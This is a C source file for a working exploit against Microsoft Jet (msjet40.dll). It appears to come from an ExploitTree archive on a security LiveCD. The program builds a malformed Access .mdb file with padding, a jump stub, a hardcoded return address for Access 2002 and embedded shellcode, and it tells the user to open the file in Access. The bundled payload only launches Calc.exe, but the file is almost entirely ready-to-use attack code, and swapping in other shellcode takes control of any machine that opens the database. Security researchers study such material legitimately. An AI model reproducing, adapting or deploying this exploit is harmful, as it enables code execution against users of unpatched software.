home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / database / mdbms / msjet.c < prev   
C/C++ Source or Header  |  2005-05-06  |  11KB  |  285 lines
  1. /* 
  2. * --------------------------------------
  3. *
  4. * Microsoft Jet (msjet40.dll) Exploit
  6. * --------------------------------------
  7. *
  8. * Author:
  9. * ----------
  10. * S.Pearson
  11. * Computer Terrorism (UK)
  12. * www.computerterrorism.com
  13. * 11/04/2005
  14. *
  15. *
  16. * Credits:
  17. * ----------
  18. * Hexview (original advisory)
  19. *
  20. *
  21. * Tested on:
  22. * ------------- 
  23. * Windows 2000 SP4 (english)
  24. * Windows XP SP0 (english)
  25. * Windows XP SP1 (english)
  26. *
  27. *
  28. * Requires:
  29. * ------------
  30. * MSAccess offset for stable jmp edx (could use others)
  31. *
  32. * 0x3005AD47 (Microsoft Access 2003) 
  33. * 0x300569F7 (Microsoft Access 2002) * DEFAULT *
  34. * 0x3007F7FF (Microsoft Access 2000)
  36. *
  37. * Tech Overview: 
  38. * ------------------
  39. * Simple exploit based upon Hexview's advisory
  40. * released 01/04/2005.
  42. * Should invoke Calc.exe when opened
  43. *
  44. *
  45. * Narrative: 
  46. * ------------
  47. * In the main this vulnerability is very simple to exploit
  48. * although a little work is required to finally get to our 
  49. * shellcode.
  50. *
  51. * As per the original advisory, insufficient data
  52. * validation is not performed when msjet40.dll 
  53. * parses a database file. Accordingly, by modifying 
  54. * parts of a .mdb database file, we can eventually 
  55. * gain control of the EIP.
  56. *
  57. *
  58. * A database.mdb file is modified at the following location
  59. *
  60. * 00002310: 65 00 00 01 <--- vulnerable value in AX (0100) 
  61. *
  62. * The value goes through a signed expansion that is 
  63. * used to access a 32-bit pointer to the variable that 
  64. * stores the address of a call table.
  65. *
  66. * mov ecx, [edi+eax*4+0B0h] // edx now points to an offset
  67. * mov edx, [ecx] // from our malformed file
  68. * call dword ptr [edx+10h] // (MSAccess jmp edx)
  69. *
  70. *
  71. * jmp edx // EDX points to start of shell_jmp 
  72. * add esi,8 // Sets up esi to point to main shell 
  73. * call esi // Execute Shellcode 
  74. *
  75. */
  76.  
  77. #include <stdio.h>
  78. #include <stdlib.h>
  79. #include <string.h>
  80.  
  81.  
  82. char header[]=
  83.  
  84. "\x00\x01\x00\x00\x53\x74\x61\x6E\x64\x61\x72\x64\x20\x4A\x65\x74"
  85. "\x20\x44\x42\x00\x01\x00\x00\x00\xB5\x6E\x03\x62\x60\x09\xC2\x55"
  86. "\xE9\xA9\x67\x72\x40\x3F\x00\x9C\x7E\x9F\x90\xFF\x85\x9A\x31\xC5"
  87. "\x79\xBA\xED\x30\xBC\xDF\xCC\x9D\x63\xD9\xE4\xC3\x9F\x46\xFB\x8A"
  88. "\xBC\x4E\xB2\x6D\xEC\x37\x69\xD2\x9C\xFA\xF2\xC8\x28\xE6\x27\x20"
  89. "\x8A\x60\x60\x02\x7B\x36\xC1\xE4\xDF\xB1\x43\x62\x13\x43\xFB\x39"
  90. "\xB1\x33\x00\xF7\x79\x5B\xA6\x23\x7C\x2A\xAF\xD0\x7C\x99\x08\x1F"
  91. "\x98\xFD\x1B\xC9\x5A\x6A\xE2\xF8\x82\x66\x5F\x95\xF8\xD0\x89\x24"
  92. "\x85\x67\xC6\x1F\x27\x44\xD2\xEE\xCF\x65\xED\xFF\x07\xC7\x46\xA1"
  93. "\x78\x16\x0C\xED\xE9\x2D\x62\xD4\x54\x06\x00\x00\x34\x2E\x30\x00";
  94.  
  95.  
  96.  
  97. char body[]=
  98.  
  99. "\x00\x00\x80\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"
  100. "\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"
  101. "\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"
  102. "\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"
  103. "\x02\x01\xDE\x0B\x00\x00\x00\x00\x90\x90\x90\x90\x59\x06\x00\x00"
  104. "\x11\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00"
  105. "\x00\x00\x00\x00\x00\x00\x00\x00\x53\x11\x00\x0B\x00\x11\x00\x02"
  106. "\x00\x00\x00\x02\x00\x00\x00\x00\x06\x00\x00\x01\x06\x00\x00\x00"
  107. "\x00\x00\x00\x11\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x11"
  108. "\x00\x00\x00\x00\x00\x00\x00\x0C\x59\x06\x00\x00\x09\x00\x03\x00"
  109. "\x00\x00\x09\x04\x00\x00\x12\x00\x00\x00\x00\x00\x00\x00\x00\x00"
  110. "\x0C\x59\x06\x00\x00\x08\x00\x02\x00\x00\x00\x09\x04\x00\x00\x12"
  111. "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x59\x06\x00\x00\x04\x00"
  112. "\x01\x00\x00\x00\x09\x04\x00\x00\x13\x00\x00\x00\x00\x00\x0a\x00"
  113. "\x08\x00\x08\x59\x06\x00\x00\x05\x00\x01\x00\x00\x00\x09\x04\x00"
  114. "\x00\x13\x00\x00\x00\x00\x00\x12\x00\x08\x00\x04\x59\x06\x00\x00"
  115. "\x07\x00\x02\x00\x00\x00\x09\x04\x00\x00\x13\x00\x00\x00\x00\x00"
  116. "\x1A\x00\x04\x00\x0A\x59\x06\x00\x00\x0A\x00\x04\x00\x00\x00\x09"
  117. "\x04\x00\x00\x12\x00\x00\x00\x00\x00\x00\x00\xFE\x01\x04\x59\x06"
  118. "\x00\x00\x00\x00\x00\x00\x00\x00\x09\x04\x00\x00\x13\x00\x00\x00"
  119. "\x00\x00\x00\x00\x04\x00\x0B\x59\x06\x00\x00\x0D\x00\x07\x00\x00"
  120. "\x00\x09\x04\x00\x00\x12\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0B"
  121. "\x59\x06\x00\x00\x10\x00\x0A\x00\x00\x00\x09\x04\x00\x00\x12\x00"
  122. "\x00\x00\x00\x00\x00\x00\x00\x00\x0B\x59\x06\x00\x00\x0F\x00\x09"
  123. "\x00\x00\x00\x09\x04\x00\x00\x12\x00\x00\x00\x00\x00\x00\x00\x00"
  124. "\x00\x0B\x59\x06\x00\x00\x0E\x00\x08\x00\x00\x00\x09\x04\x00\x00"
  125. "\x12\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0A\x59\x06\x00\x00\x02"
  126. "\x00\x00\x00\x00\x00\x09\x04\x00\x00\x12\x00\x00\x00\x00\x00\x00"
  127. "\x00\xFE\x01\x09\x59\x06\x00\x00\x06\x00\x01\x00\x00\x00\x09\x04"
  128. "\x00\x00\x32\x00\x00\x00\x00\x00\x00\x00\xFE\x01\x04\x59\x06\x00"
  129. "\x00\x01\x00\x00\x00\x00\x00\x09\x04\x00\x00\x13\x00\x00\x00\x00"
  130. "\x00\x04\x00\x04\x00\x0B\x59\x06\x00\x00\x0C\x00\x06\x00\x00\x00"
  131. "\x09\x04\x00\x00\x12\x00\x00\x00\x00\x00\x00\x00\x00\x00\x09\x59"
  132. "\x06\x00\x00\x0B\x00\x05\x00\x00\x00\x09\x04\x00\x00\x12\x00\x00"
  133. "\x00\x00\x00\x00\x00\xFE\x01\x03\x59\x06\x00\x00\x03\x00\x01\x00"
  134. "\x00\x00\x09\x04\x00\x00\x13\x00\x00\x00\x00\x00\x08\x00\x02\x00"
  135. "\x0E\x00\x43\x00\x6F\x00\x6E\x00\x6E\x00\x65\x00\x63\x00\x74\x00"
  136. "\x10\x00\x44\x00\x61\x00\x74\x00\x61\x00\x62\x00\x61\x00\x73\x00"
  137. "\x65\x00\x14\x00\x44\x00\x61\x00\x74\x00\x65\x00\x43\x00\x72\x00"
  138. "\x65\x00\x61\x00\x74\x00\x65\x00\x14\x00\x44\x00\x61\x00\x74\x00"
  139. "\x65\x00\x55\x00\x70\x00\x64\x00\x61\x00\x74\x00\x65\x00\x0A\x00"
  140. "\x46\x00\x6C\x00\x61\x00\x67\x00\x73\x00\x16\x00\x46\x00\x6F\x00"
  141. "\x72\x00\x65\x00\x69\x00\x67\x00\x6E\x00\x4E\x00\x61\x00\x6D\x00"
  142. "\x65\x00\x04\x00\x49\x00\x64\x00\x04\x00\x4C\x00\x76\x00\x0E\x00"
  143. "\x4C\x00\x76\x00\x45\x00\x78\x00\x74\x00\x72\x00\x61\x00\x10\x00"
  144. "\x4C\x00\x76\x00\x4D\x00\x6F\x00\x64\x00\x75\x00\x6C\x00\x65\x00"
  145. "\x0C\x00\x4C\x00\x76\x00\x50\x00\x72\x00\x6F\x00\x70\x00\x08\x00"
  146. "\x4E\x00\x61\x00\x6D\x00\x65\x00\x0A\x00\x4F\x00\x77\x00\x6E\x00"
  147. "\x65\x00\x72\x00\x10\x00\x50\x00\x61\x00\x72\x00\x65\x00\x6E\x00"
  148. "\x74\x00\x49\x00\x64\x00\x16\x00\x52\x00\x6D\x00\x74\x00\x49\x00"
  149. "\x6E\x00\x66\x00\x6F\x00\x4C\x00\x6F\x00\x6E\x00\x67\x00\x18\x00"
  150. "\x52\x00\x6D\x00\x74\x00\x49\x00\x6E\x00\x66\x00\x6F\x00\x53\x00"
  151. "\x68\x00\x6F\x00\x72\x00\x74\x00\x08\x00\x54\x00\x79\x00\x70\x00"
  152. "\x65\x00\x83\x07\x00\x00\x01\x00\x01\x02\x00\x01\xFF\xFF\x00\xFF"
  153. "\xFF\x00\xFF\xFF\x00\xFF\xFF\x00\xFF\xFF\x00\xFF\xFF\x00\xFF\xFF"
  154. "\x00\xFF\xFF\x00\x10\x06\x00\x00\x07\x00\x00\x00\x00\x00\x00\x00"
  155. "\x81\x00\x00\x00\x00\x00\x83\x07\x00\x00\x00\x00\x01\xFF\xFF\x00"
  156. "\xFF\xFF\x00\xFF\xFF\x00\xFF\xFF\x00\xFF\xFF\x00\xFF\xFF\x00\xFF"
  157. "\xFF\x00\xFF\xFF\x00\xFF\xFF\x00\x11\x06\x00\x00\x08\x00\x00\x00"
  158. "\x00\x00\x00\x00\x81\x00\x00\x00\x00\x00\x59\x06\x00\x00\x01\x00"
  159. "\x00\x00\x01\x00\x00\x00\x00\xFF\xFF\xFF\xFF\x00\x00\x00\x00\x04"
  160. "\x04\x01\x00\x00\x00\x00\x59\x06\x00\x00\x00\x00\x00\x00\x00\x00"
  161. "\x00\x00\x00\xFF\xFF\xFF\xFF\x00\x00\x00\x00\x04\x04\x00\x00\x00"
  162. "\x00\x00";
  163.  
  164.  
  165. char shell_jmp[]= 
  166.  
  167. "\x14\x00" // Expanded ID Parameter (20 bytes) to accommodate this code
  168. "\x83\xC6\x08" // Add ESI,8 (Pointer to our shellcode)
  169. "\xFF\xE6" // Call ESI (Execute Shellcode)
  170. "\x90\x90\x90\x90" 
  171. "\x90\x90\x90\x90" // Not used
  172. "\x90\x90\x90";
  173.  
  174.  
  175. char EIP[]=
  176.  
  177.  
  178. //"\x47\xAD\x05\x30"; // MSAccess 2003 (jmp edx) 
  179. "\xF7\x69\x05\x30"; // MSAccess 2002 (jmp edx) 
  180. //"\xFf\xf7\x07\x30"; // MSAccess 2000 (jmp edx) 
  181.  
  182.  
  183. char vuln_param[]= 
  184.  
  185. "\x18\x00\x50\x00"
  186. "\x61\x00\x72\x00"
  187. "\x65\x00\x6E\x00"
  188. "\x74\x00\x49\x00"
  189. "\x64\x00\x4E\x00"
  190. "\x61\x00\x6D\x00"
  191. "\x65\x00\x00\x01" // 0100 will result in EDX pointing to a 
  192. // variable containing our MSAccess offset 
  193.  
  194. "\x04\x06\x00\x00"
  195. "\x05\x06" ;
  196.  
  197.  
  198.  
  199.  
  200. char shellcode[]= 
  201.  
  202. /* Invokes Calc.exe in another Process
  203. */
  204.  
  205. "\x29\xC9\x83\xE9\xDB\xD9\xEE\xD9\x74\x24\xF4\x5B\x81\x73\x13\xA9"
  206. "\x67\x4A\xCC\x83\xEB\xFC\xE2\xF4\x55\x8F\x0C\xCC\xA9\x67\xC1\x89"
  207. "\x95\xEC\x36\xC9\xD1\x66\xA5\x47\xE6\x7F\xC1\x93\x89\x66\xA1\x2F"
  208. "\x87\x2E\xC1\xF8\x22\x66\xA4\xFD\x69\xFE\xE6\x48\x69\x13\x4D\x0D"
  209. "\x63\x6A\x4B\x0E\x42\x93\x71\x98\x8D\x63\x3F\x2F\x22\x38\x6E\xCD"
  210. "\x42\x01\xC1\xC0\xE2\xEC\x15\xD0\xA8\x8C\xC1\xD0\x22\x66\xA1\x45"
  211. "\xF5\x43\x4E\x0F\x98\xA7\x2E\x47\xE9\x57\xCF\x0C\xD1\x68\xC1\x8C"
  212. "\xA5\xEC\x3A\xD0\x04\xEC\x22\xC4\x40\x6C\x4A\xCC\xA9\xEC\x0A\xF8"
  213. "\xAC\x1B\x4A\xCC\xA9\xEC\x22\xF0\xF6\x56\xBC\xAC\xFF\x8C\x47\xA4"
  214. "\xD7\xBF\xA8\xBF\xC1\xFF\xB4\x46\xA7\x30\xB5\x2B\x41\x89\xB5\x33"
  215. "\x56\x04\x2B\xA0\xCA\x49\x2F\xB4\xCC\x67\x4A\xCC";
  216.  
  217. char body2[]= 
  218.  
  219. "\x02\x01\xA9\x0E\x00\x00\x00\x00\x4F\x01\x00\x00\x59\x06\x00\x00"
  220. "\x34\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00"
  221. "\x00\x00\x00\x00\x00\x00\x00\x00\x53\x04\x00\x01\x00\x04\x00\x01"
  222. "\x00\x00\x00\x01\x00\x00\x00\x12\x06\x00\x00\x13\x06\x00\x00\x00"
  223. "\x00\x00\x00\x11\x00\x00\x00\x00\x00\x00\x00\x04\x59\x06\x00\x00"
  224. "\x02\x00\x01\x00\x00\x00\x09\x04\x00\x00\x13\x00\x00\x00\x00\x00"
  225. "\x04\x00\x04\x00\x01\x59\x06\x00\x00\x03\x00\x01\x00\x00\x00\x09"
  226. "\x04\x00\x00\x13\x00\x00\x00\x00\x00\x00\x00\x01\x00\x04\x59\x06"
  227. "\x00\x00\x00\x00\x00\x00\x00\x00\x09\x04\x00\x00\x13\x00\x00\x00"
  228. "\x00\x00\x00\x00\x04\x00\x09\x59\x06\x00\x00\x01\x00\x00\x00\x00"
  229. "\x00\x09\x04\x00\x00\x32\x00\x00\x00\x00\x00\x07\x00\xFE\x01\x06"
  230. "\x00\x41\x00\x43\x00\x4D\x00\x18\x00\x46\x00\x49\x00\x6E\x00\x68"
  231. "\x00\x65\x00\x72\x00\x69\x00\x74\x00\x61\x00\x62\x00\x6C\x00\x65"
  232. "\x00\x10\x00\x4F\x00\x62\x00\x6A\x00\x65\x00\x63\x00\x74\x00\x49"
  233. "\x00\x64\x00\x06\x00\x53\x00\x49\x00\x44\x00\x83\x07\x00\x00\x00"
  234. "\x00\x01\xFF\xFF\x00\xFF\xFF\x00\xFF\xFF\x09\xFF\xFF\x00\xFF\xFF"
  235. "\x00\xFF\xFF\x00\xFF\xFF\x04\xFF\xFF\x12\xFF\xFF\x00\x14\x06\x00"
  236. "\x00\x09\x000\x0\x00\x41\x00\x74\x00\x88\x00\x00\x00\x00\x00\x59"
  237. "\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFF\xFF\xFF"
  238. "\x00\x00\x00\x00\x04\x04\x00\x00\x00\x00\x00\x10\x00\x4F\x00\x62"
  239. "\x00\x6A\x00\x65\x00\x63\x00\x74\x00\x49\x00\x64\x00\xFF\xFF\x00";
  240.  
  241. char mdb[94208];
  242.  
  243. int main(int argc,char *argv[])
  244. {
  245.  
  246. FILE *filename_mdb;
  247. if(argc == 1)
  248. {
  249. printf("\nMicrosoft Jet (msjet40.dll) Exploit\n");
  250. printf("===================================\n\n");
  251. printf("Author: S.Pearson\n");
  252. printf("Organisation: Computer Terrorism (UK)\n\n");
  253. printf("Usage: %s <filename.mdb>\n",argv[0]);
  254. return 1;
  255. }
  256.  
  257. filename_mdb = fopen(argv[1],"wb");
  258.  
  259. memset(mdb,0x00,sizeof(mdb)); //fill with nulls
  260. memcpy(mdb,header,sizeof(header)); 
  261. memset(mdb+sizeof(header)-1,0x43, 7968);
  262. memcpy(mdb+sizeof(header)-1+7969-1,body, sizeof(body));
  263. memcpy(mdb+sizeof(header)-1+7968+sizeof(body)-1,shell_jmp, sizeof(shell_jmp));
  264. memcpy(mdb+sizeof(header)-1+7968+sizeof(body)-1+sizeof(shell_jmp)-1, EIP, sizeof(EIP));
  265. memcpy(mdb+sizeof(header)-1+7968+sizeof(body)-1+sizeof(shell_jmp)-1+sizeof(EIP)-1, 
  266. vuln_param, sizeof(vuln_param));
  267. memcpy(mdb+sizeof(header)-1+7968+sizeof(body)-1+sizeof(shell_jmp)-1+sizeof(EIP)-1+
  268. sizeof(vuln_param)-1, shellcode, sizeof(shellcode));
  269. memset(mdb+sizeof(header)-1+7968-1+sizeof(body)-1+sizeof(shell_jmp)-1+sizeof(EIP)-1+
  270. sizeof(vuln_param)-1+sizeof(shellcode), 0x43, 2924);
  271. memcpy(mdb+sizeof(header)-1+7968-1+sizeof(body)-1+sizeof(shell_jmp)-1+sizeof(EIP)-1+
  272. sizeof(vuln_param)-1+sizeof(shellcode)-1+2924-1,body2,sizeof(body2));
  273.  
  274.  
  275. if(filename_mdb)
  276. {
  277. fwrite(mdb,1,sizeof(mdb),filename_mdb);
  278. fclose(filename_mdb);
  279. }
  280. printf("Malformed .mdb file created.\n");
  281. printf("Now open with MSAccess.\n");
  282. return 0;
  283. }
  284.  
  285.